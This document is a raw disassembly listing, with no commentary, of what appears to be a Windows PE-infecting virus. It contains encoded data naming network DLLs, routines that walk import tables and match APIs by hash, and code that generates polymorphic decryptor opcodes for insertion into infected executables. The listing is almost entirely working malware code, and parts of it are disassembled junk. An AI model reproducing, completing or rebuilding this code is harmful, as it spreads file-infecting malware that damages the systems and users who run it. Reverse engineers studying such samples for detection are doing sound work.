dd 0D6E80040h, 66FFFFF6h, 1D6785C7h, 0F0FF0040h, 1D69A583h
dd 8D000040h, 401D2795h, 6A545000h, 52006A01h, 268h, 3095FF80h
dd 85004036h, 22755AC0h, 1D5A8D8Dh, 6A520040h, 67B58D06h
dd 5400401Dh, 51505056h, 3495FF52h, 58004036h, 362C95FFh
dd 85C60040h, 40384Dh, 0CE800h, 53570000h, 334B434Fh, 4C442E32h
dd 95FF004Ch, 40359Ch, 76893h, 0B58D0000h, 401844h, 0FCBD8D59h
dd 0E8004035h, 0FFFFF651h, 0CE8h, 4E495700h, 54454E49h
dd 4C4C442Eh, 9C95FF00h, 85004035h, 0E7840FC0h, 93000001h
dd 568h, 82B58D00h, 59004018h, 3618BD8Dh, 1AE80040h, 83FFFFF6h
dd 40361CBDh, 840F0000h, 1C2h, 190EC81h, 68540000h, 101h
dd 35FC95FFh, 0C4810040h, 190h, 6AD48B50h, 95FF5200h, 40361Ch
dd 7559C085h, 1388680Dh, 95FF0000h, 4035BCh, 0BD83E2EBh
dd 401D69h, 8D297500h, 401D6D85h, 95FF5000h, 403608h, 840FC085h
dd 13Bh, 8B0C408Bh, 8F30FF00h, 401D6985h, 4D85C600h, 1004038h
dd 16A006Ah, 95FF026Ah, 403614h, 0FFFF883h, 11284h, 958D9300h
dd 401D65h, 5352106Ah, 360495FFh, 0C0850040h, 0F2850Fh
dd 0BD8D0000h, 401D86h, 0BCE808B1h, 68FFFFFAh, 94h, 89E62B5Eh
dd 0FF542434h, 40359895h, 94BD8D00h, 0B100401Dh, 0FA9DE801h
dd 448BFFFFh, 0E0C11024h, 24440B08h, 8E0C104h, 824440Bh
dd 5E850h, 2E250000h, 57007836h, 355495FFh, 0C4830040h
dd 647C60Ch, 81958D20h, 6A00401Dh, 216800h, 53520000h
dd 361095FFh, 7C8D0040h, 0FF571424h, 40355895h, 3804C600h
dd 6A400Ah, 0FF535750h, 40361095h, 8DE60300h, 401DA2BDh
dd 68006A00h, 0Ch, 95FF5357h, 403610h, 0C3Dh, 8D4D7500h
dd 40364EB5h, 4D8D8D00h, 2B004038h, 51006ACEh, 95FF5356h
dd 40360Ch, 7E00F883h, 0FE8B912Fh, 364EB58Dh, 0DB00040h
dd 1075AEF2h, 0FAF8E860h, 7261FFFFh, 8D09E317h, 0EAEB0177h
dd 0CE2BCF8Bh, 364EBD8Dh, 0A4F30040h, 0B9EBF787h, 95FF53h
dd 80004036h, 401577BDh, 2A740100h, 753068h, 0BC95FF00h
dd 80004035h, 40384DBDh, 11740000h, 1D6985C7h, 40h, 85C60000h
dd 40384Dh, 0FE56E900h, 85C7FFFFh, 401580h, 80000000h
dd 4C25Dh, 204F0A0Dh, 6E6F6F6Eh, 20666F20h, 6566696Ch
dd 204F2021h, 656D6974h, 206F7420h, 656C6563h, 74617262h
dd 0A0D2165h, 20202020h, 73204F20h, 656D6D75h, 61672072h
dd 6E656472h, 520A0D21h, 6E656C65h, 73656C74h, 20796C73h
dd 70706168h, 6E612079h, 78652064h, 74636570h, 2C746E61h
dd 61747320h, 6E69646Eh, 2D203A67h, 61570A0Dh, 69686374h
dd 6120676Eh, 64206C6Ch, 61207961h, 6E20646Eh, 74686769h
dd 6F66202Ch, 72662072h, 646E6569h, 20492073h, 74696177h
dd 570A0D3Ah, 65726568h, 65726120h, 756F7920h, 7266202Ch
dd 646E6569h, 43203F73h, 21656D6Fh, 20744920h, 74207369h
dd 21656D69h, 27744920h, 616C2073h, 0D216574h, 0D479ED0Ah
dd 0A614294Fh, 6E7FAF10h, 0C7840460h, 0B81D9830h, 37524853h
dd 0FC74C940h, 0AB5957ABh, 0B1FAE53Ah, 18C30927h, 99AD47B9h
dd 0E9A3A262h, 0A614130Ch, 6EF96A10h, 73C17E60h, 0B8B3521Ah
dd 0D8h, 0Eh dup(0)
dd 0D18300h
db 0B3h
; =============== S U B R O U T I N E =======================================
sub_40AD11 proc near ; CODE XREF: sub_40AD58:loc_40ADB5�p
; sub_40AE18+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_40AD2D: ; CODE XREF: sub_40AD11+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_40AD4F
cmp eax, [edx+8]
jnb short loc_40AD4F
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_40AD54
; ---------------------------------------------------------------------------
loc_40AD4F: ; CODE XREF: sub_40AD11+23�j
; sub_40AD11+28�j
add edx, 28h
loop loc_40AD2D
loc_40AD54: ; CODE XREF: sub_40AD11+3C�j
popa
retn 4
sub_40AD11 endp
; =============== S U B R O U T I N E =======================================
sub_40AD58 proc near ; CODE XREF: .rsrc:0040B084�p
; .rsrc:0040B0AA�p
mov [ebp+4022F7h], al
call sub_40ADC7
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_40AD6F: ; CODE XREF: sub_40AD58+1E�j
cmp [eax], ebx
jz short loc_40AD7F
add eax, 4
loop loc_40AD6F
inc dword ptr ss:loc_40398E[ebp]
retn
; ---------------------------------------------------------------------------
loc_40AD7F: ; CODE XREF: sub_40AD58+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_40AD99
loc_40AD89: ; CODE XREF: sub_40AD58+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_40AD89
mov [ebp+402224h], ebx
loc_40AD99: ; CODE XREF: sub_40AD58+2F�j
; sub_40ADC7+34�j
cmp dword ptr [edx], 0
jz short loc_40ADA3
sub esi, [edx]
add esi, [edx+10h]
loc_40ADA3: ; CODE XREF: sub_40AD58+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_40ADB2
push dword ptr [edx]
jmp short loc_40ADB5
; ---------------------------------------------------------------------------
loc_40ADB2: ; CODE XREF: sub_40AD58+54�j
push dword ptr [edx+10h]
loc_40ADB5: ; CODE XREF: sub_40AD58+58�j
call sub_40AD11
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_40AD58 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40ADC7 proc near ; CODE XREF: sub_40AD58+6�p
pop dword ptr [ebp+403992h]
mov dword ptr ss:loc_40398E[ebp], 0
call sub_40AE18
mov eax, dword ptr ss:loc_40398E[ebp]
call sub_40A55C
call sub_40AE04
cmp dword ptr ss:loc_40398E[ebp], 0
jnz short loc_40ADFD
mov [ebp+4022A0h], ebx
jmp short loc_40AD99
; ---------------------------------------------------------------------------
loc_40ADFD: ; CODE XREF: sub_40ADC7+2C�j
dec dword ptr ss:loc_40398E[ebp]
retn
sub_40ADC7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40AE04 proc near ; CODE XREF: sub_40ADC7+20�p
pop dword ptr [ebp+403992h]
mov dword ptr ss:loc_40398E[ebp], edx
call sub_40AE18
xor ecx, ecx
retn
sub_40AE04 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40AE18 proc near ; CODE XREF: sub_40ADC7+10�p
; sub_40AE04+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_40AD11
add edx, [ebp+4039AAh]
add edx, esi
loc_40AE2C: ; CODE XREF: sub_40AE18+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_40AF3D
cmp dword ptr [edx+10h], 0
jz locret_40AF3D
mov eax, [edx+0Ch]
push eax
call sub_40AD11
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_40AE52: ; CODE XREF: sub_40AE18+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_40AE72
cmp cl, 2Eh
jz short loc_40AE61
loc_40AE5E: ; CODE XREF: sub_40AE18+58�j
inc eax
jmp short loc_40AE52
; ---------------------------------------------------------------------------
loc_40AE61: ; CODE XREF: sub_40AE18+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_40AE5E
loc_40AE72: ; CODE XREF: sub_40AE18+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_40AF35
cmp word ptr [eax-2], 3233h
jnz loc_40AF35
push esi
cmp dword ptr [edx], 0
jnz short loc_40AE95
mov ecx, [edx+10h]
jmp short loc_40AE97
; ---------------------------------------------------------------------------
loc_40AE95: ; CODE XREF: sub_40AE18+76�j
mov ecx, [edx]
loc_40AE97: ; CODE XREF: sub_40AE18+7B�j
add esi, ecx
push ecx
call sub_40AD11
add esi, [ebp+4039AAh]
loc_40AEA5: ; CODE XREF: sub_40AE18+90�j
; sub_40AE18+117�j
lodsd
test eax, eax
js short loc_40AEA5
jz loc_40AF34
push dword ptr [ebp+4039AAh]
push eax
call sub_40AD11
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_40AED1: ; CODE XREF: sub_40AE18+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_40AEE8
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_40AED1
; ---------------------------------------------------------------------------
loc_40AEE8: ; CODE XREF: sub_40AE18+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_40AF2E
cmp ebx, 0DB6E45A8h
jz short loc_40AF2E
cmp ebx, 0FFA13B59h
jz short loc_40AF2E
cmp ebx, 0ACB522D6h
jz short loc_40AF2E
cmp ebx, 0F358E993h
jz short loc_40AF2E
cmp ebx, 0F358E97Dh
jz short loc_40AF2E
cmp ebx, 0E1253F46h
jz short loc_40AF2E
cmp ebx, 0E1253F30h
jz short loc_40AF2E
call dword ptr [ebp+403992h]
loc_40AF2E: ; CODE XREF: sub_40AE18+D6�j
; sub_40AE18+DE�j ...
pop ebx
jmp loc_40AEA5
; ---------------------------------------------------------------------------
loc_40AF34: ; CODE XREF: sub_40AE18+92�j
pop esi
loc_40AF35: ; CODE XREF: sub_40AE18+60�j
; sub_40AE18+6C�j
add edx, 14h
jmp loc_40AE2C
; ---------------------------------------------------------------------------
locret_40AF3D: ; CODE XREF: sub_40AE18+18�j
; sub_40AE18+22�j
retn
sub_40AE18 endp
; ---------------------------------------------------------------------------
db 3
; =============== S U B R O U T I N E =======================================
sub_40AF3F proc near ; CODE XREF: .rsrc:0040B07D�p
; .rsrc:0040B0A3�p
push 4
pop eax
call sub_40A55C
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_40A55C
add edx, 8
xchg edx, ecx
loc_40AF67: ; CODE XREF: sub_40AF3F:loc_40AFA6�j
push 5
pop eax
call sub_40A55C
cmp dl, 3
jnb short loc_40AF7F
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_40AFA6
; ---------------------------------------------------------------------------
loc_40AF7F: ; CODE XREF: sub_40AF3F+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_40AFA0
mov al, 11h
call sub_40A55C
mov eax, 1
loc_40AF94: ; CODE XREF: sub_40AF3F+5D�j
test dl, dl
jz short loc_40AFA5
shl eax, 1
dec dl
jmp short loc_40AF94
; ---------------------------------------------------------------------------
jmp short loc_40AFA5
; ---------------------------------------------------------------------------
loc_40AFA0: ; CODE XREF: sub_40AF3F+47�j
mov eax, 80000000h
loc_40AFA5: ; CODE XREF: sub_40AF3F+57�j
; sub_40AF3F+5F�j
stosd
loc_40AFA6: ; CODE XREF: sub_40AF3F+3E�j
loop loc_40AF67
retn
sub_40AF3F endp
; ---------------------------------------------------------------------------
loc_40AFA9: ; CODE XREF: sub_40BA03+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_40AFBE
mov al, 60h
stosb
loc_40AFBE: ; CODE XREF: .rsrc:0040AFB9�j
test dword ptr [ebp+403431h], 1000003h
jz loc_40B0C4
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0BDCA5B82h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_40B03C
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_40B007
mov eax, 2E8B6467h
loc_40B007: ; CODE XREF: .rsrc:0040B000�j
stosd
mov ax, 0
stosw
jz short loc_40B013
mov al, 5Dh
stosb
loc_40B013: ; CODE XREF: .rsrc:0040B00E�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_40B03A
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_40B03A
mov eax, 0F8ED83h
loc_40B03A: ; CODE XREF: .rsrc:0040B022�j
; .rsrc:0040B033�j
stosd
dec edi
loc_40B03C: ; CODE XREF: .rsrc:0040AFEF�j
test dword ptr [ebp+403431h], 3
jz short loc_40B04C
mov al, 0E9h
stosb
stosd
loc_40B04C: ; CODE XREF: .rsrc:0040B046�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_40B0C4
mov eax, 36FF6467h
mov dword ptr ss:loc_40399E[ebp], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_40AF3F
mov al, 20h
call sub_40AD58
jecxz short loc_40B0C4
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_40B0B7
call sub_40AF3F
mov al, 1Fh
call sub_40AD58
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_40B0B7: ; CODE XREF: .rsrc:0040B0A1�j
mov ecx, edi
mov eax, dword ptr ss:loc_40399E[ebp]
sub ecx, eax
mov [eax-4], ecx
loc_40B0C4: ; CODE XREF: .rsrc:0040AFC8�j
; .rsrc:0040B063�j ...
test dword ptr [ebp+403431h], 4
jz short loc_40B0E2
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_40B0E2: ; CODE XREF: .rsrc:0040B0CE�j
test dword ptr [ebp+403431h], 8
jnz short loc_40B138
cmp byte ptr ss:loc_40342F[ebp], 0
jz short loc_40B138
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, byte ptr ss:loc_40342F[ebp]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_40B136
mov al, 49h
stosb
mov ax, 0FC75h
loc_40B136: ; CODE XREF: .rsrc:0040B12D�j
stosw
loc_40B138: ; CODE XREF: .rsrc:0040B0EC�j
; .rsrc:0040B0F5�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov dword ptr ss:loc_403982[ebp], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_40B159
mov al, 58h
or al, [ebp+403429h]
stosb
loc_40B159: ; CODE XREF: .rsrc:0040B14E�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_40B16C
add ah, 28h
loc_40B16C: ; CODE XREF: .rsrc:0040B167�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_40B190
mov al, 50h
add al, [ebp+403429h]
stosb
loc_40B190: ; CODE XREF: .rsrc:0040B185�j
test dword ptr [ebp+403431h], 80h
jnz short loc_40B1A7
mov al, 0B8h
or al, byte ptr ss:loc_40342A[ebp]
stosb
jmp short loc_40B1E4
; ---------------------------------------------------------------------------
loc_40B1A7: ; CODE XREF: .rsrc:0040B19A�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_40B1B9
mov al, 29h
loc_40B1B9: ; CODE XREF: .rsrc:0040B1B5�j
or ah, byte ptr ss:loc_40342A[ebp]
shl ah, 3
or ah, byte ptr ss:loc_40342A[ebp]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_40B1DC
mov ah, 0C8h
loc_40B1DC: ; CODE XREF: .rsrc:0040B1D8�j
or ah, byte ptr ss:loc_40342A[ebp]
stosw
loc_40B1E4: ; CODE XREF: .rsrc:0040B1A5�j
mov dword ptr ss:loc_4039A2[ebp], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_40B268
test dword ptr [ebp+403431h], 400h
jnz short loc_40B213
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_40B260
; ---------------------------------------------------------------------------
loc_40B213: ; CODE XREF: .rsrc:0040B206�j
test dword ptr [ebp+403431h], 800h
jnz short loc_40B230
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_40B245
; ---------------------------------------------------------------------------
loc_40B230: ; CODE XREF: .rsrc:0040B21D�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_40B245: ; CODE XREF: .rsrc:0040B22E�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_40B258
add ah, 8
loc_40B258: ; CODE XREF: .rsrc:0040B253�j
or ah, [ebp+40342Bh]
stosw
loc_40B260: ; CODE XREF: .rsrc:0040B211�j
movzx eax, byte ptr ss:loc_40342F[ebp]
stosd
loc_40B268: ; CODE XREF: .rsrc:0040B1FA�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_40B27D
mov al, 50h
add al, [ebp+403429h]
stosb
loc_40B27D: ; CODE XREF: .rsrc:0040B272�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_40B28D
add al, 4
loc_40B28D: ; CODE XREF: .rsrc:0040B289�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov dword ptr ss:loc_40398A[ebp], ecx
stosw
cmp ah, 5
jnz short loc_40B2AA
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_40B2AA: ; CODE XREF: .rsrc:0040B2A1�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_40B2BC
mov ah, 29h
loc_40B2BC: ; CODE XREF: .rsrc:0040B2B8�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_40B2DA
mov al, 86h
loc_40B2DA: ; CODE XREF: .rsrc:0040B2D6�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_40B2EE
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_40B2EE: ; CODE XREF: .rsrc:0040B2E5�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_40B305
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_40B314
; ---------------------------------------------------------------------------
loc_40B305: ; CODE XREF: .rsrc:0040B2F8�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_40B314: ; CODE XREF: .rsrc:0040B303�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_40B34F
test dword ptr [ebp+403431h], 40000h
jnz short loc_40B346
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_40B34E
; ---------------------------------------------------------------------------
loc_40B346: ; CODE XREF: .rsrc:0040B32A�j
mov al, 40h
or al, [ebp+40342Bh]
loc_40B34E: ; CODE XREF: .rsrc:0040B344�j
stosb
loc_40B34F: ; CODE XREF: .rsrc:0040B31E�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_40B36B
mov ax, 0E883h
or ah, byte ptr ss:loc_40342A[ebp]
stosw
mov al, 1
jmp short loc_40B373
; ---------------------------------------------------------------------------
loc_40B36B: ; CODE XREF: .rsrc:0040B359�j
mov al, 48h
or al, byte ptr ss:loc_40342A[ebp]
loc_40B373: ; CODE XREF: .rsrc:0040B369�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_40B3A7
mov ax, 0F883h
or ah, byte ptr ss:loc_40342A[ebp]
stosw
xor eax, eax
stosb
sub dword ptr ss:loc_40398A[ebp], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_40B3C2
mov cl, 77h
jmp short loc_40B3C2
; ---------------------------------------------------------------------------
loc_40B3A7: ; CODE XREF: .rsrc:0040B380�j
mov ax, 1809h
or ah, byte ptr ss:loc_40342A[ebp]
shl ah, 3
or ah, byte ptr ss:loc_40342A[ebp]
stosw
sub dword ptr ss:loc_40398A[ebp], edi
loc_40B3C2: ; CODE XREF: .rsrc:0040B3A1�j
; .rsrc:0040B3A5�j
mov al, cl
mov ah, byte ptr ss:loc_40398A[ebp]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_40B46C
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_40B403
mov eax, 2E876467h
loc_40B403: ; CODE XREF: .rsrc:0040B3FC�j
stosd
mov eax, 0
stosw
jnz short loc_40B413
mov ax, 0E58Bh
stosw
loc_40B413: ; CODE XREF: .rsrc:0040B40B�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_40B469
test dword ptr [ebp+403431h], 8000000h
jz short loc_40B45B
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_40B456
mov ax, 424h
stosw
jmp short loc_40B469
; ---------------------------------------------------------------------------
loc_40B456: ; CODE XREF: .rsrc:0040B44C�j
mov al, 8
stosb
jmp short loc_40B469
; ---------------------------------------------------------------------------
loc_40B45B: ; CODE XREF: .rsrc:0040B433�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_40B46C
; ---------------------------------------------------------------------------
loc_40B469: ; CODE XREF: .rsrc:0040B427�j
; .rsrc:0040B454�j ...
mov al, 0C9h
stosb
loc_40B46C: ; CODE XREF: .rsrc:0040B3DF�j
; .rsrc:0040B467�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_40B498
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_40B498: ; CODE XREF: .rsrc:0040B476�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_40B503
test dword ptr [ebp+403431h], 20000000h
jz short loc_40B4C9
loc_40B4BC: ; CODE XREF: .rsrc:0040B4C7�j
test edi, 3
jz short loc_40B4C9
mov al, 90h
stosb
jmp short loc_40B4BC
; ---------------------------------------------------------------------------
loc_40B4C9: ; CODE XREF: .rsrc:0040B4BA�j
; .rsrc:0040B4C2�j
mov eax, edi
mov ecx, dword ptr ss:loc_403982[ebp]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_40B4F7
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_40B501
; ---------------------------------------------------------------------------
loc_40B4F7: ; CODE XREF: .rsrc:0040B4E9�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_40B501: ; CODE XREF: .rsrc:0040B4F5�j
stosw
loc_40B503: ; CODE XREF: .rsrc:0040B4AE�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_40B582
test dword ptr [ebp+403431h], 20000000h
jz short loc_40B528
loc_40B51B: ; CODE XREF: .rsrc:0040B526�j
test edi, 3
jz short loc_40B528
mov al, 90h
stosb
jmp short loc_40B51B
; ---------------------------------------------------------------------------
loc_40B528: ; CODE XREF: .rsrc:0040B519�j
; .rsrc:0040B521�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_40B551
lea eax, [ebp+403429h]
loc_40B549: ; CODE XREF: .rsrc:0040B54F�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_40B549
loc_40B551: ; CODE XREF: .rsrc:0040B541�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_40B566
mov ax, 0C031h
stosw
loc_40B566: ; CODE XREF: .rsrc:0040B55E�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_40B57F
mov ax, 0C031h
stosw
loc_40B57F: ; CODE XREF: .rsrc:0040B577�j
mov al, 0C3h
stosb
loc_40B582: ; CODE XREF: .rsrc:0040B50D�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_40B59A
push edi
sub edi, eax
pop eax
jmp short loc_40B5B3
; ---------------------------------------------------------------------------
loc_40B59A: ; CODE XREF: .rsrc:0040B592�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, dword ptr ss:loc_4039A2[ebp]
add dword ptr ss:loc_403982[ebp], edx
add [ecx], edi
mov eax, [esp+4]
loc_40B5B3: ; CODE XREF: .rsrc:0040B598�j
mov dword ptr ss:loc_40106D[ebp], edi
mov edi, [ebp+403986h]
sub eax, dword ptr ss:loc_403982[ebp]
test dword ptr [ebp+403431h], 40h
jz short loc_40B5D3
neg eax
loc_40B5D3: ; CODE XREF: .rsrc:0040B5CF�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_40B5D7 proc near ; CODE XREF: sub_40BA03+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_40B7BF
call near ptr loc_40B5F7+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_40B5F7: ; CODE XREF: sub_40B5D7+F�p
add bh, bh
sub_40B5D7 endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_40AD11
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_40AD11
mov edi, [ebp+4039A6h]
push esi
call sub_40AD11
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_40B7BF
jz loc_40B7BF
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_40B790
loc_40B671: ; CODE XREF: sub_40B790+29�j
lodsb
cmp al, 0E8h
jnz loc_40B71C
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_40AD11
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_40B69F
cmp eax, [edi+0Ch]
jnb loc_40B7B8
jmp short loc_40B6AB
; ---------------------------------------------------------------------------
loc_40B69F: ; CODE XREF: sub_40B790-FE�j
cmp [ebp+4039A6h], edx
jnz loc_40B7B8
loc_40B6AB: ; CODE XREF: sub_40B790-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_40B7B8
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_40AD11
cmp [ebp+4039A6h], edi
jnz loc_40B7B8
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_40B7B8
cmp eax, [edi+8]
jnb loc_40B7B8
loc_40B6F4: ; CODE XREF: sub_40B790+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_40B7CE
jmp loc_40B7B8
; ---------------------------------------------------------------------------
loc_40B71C: ; CODE XREF: sub_40B790-11C�j
cmp al, 0FFh
jnz loc_40B7B8
cmp byte ptr [esi], 15h
jnz loc_40B7B8
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_40AD11
cmp [ebp+4039A6h], edi
jnz short loc_40B7B8
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_40B765
cmp eax, [ebp+4039C6h]
jb short loc_40B7CE
loc_40B765: ; CODE XREF: sub_40B790-35�j
cmp eax, 70000000h
jb short loc_40B7A3
call sub_40B790
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_40B78F
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_40B7AA
; ---------------------------------------------------------------------------
locret_40B78F: ; CODE XREF: sub_40B790-F�j
retn
; END OF FUNCTION CHUNK FOR sub_40B790
; =============== S U B R O U T I N E =======================================
sub_40B790 proc near ; CODE XREF: sub_40B790-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 0040B671 SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
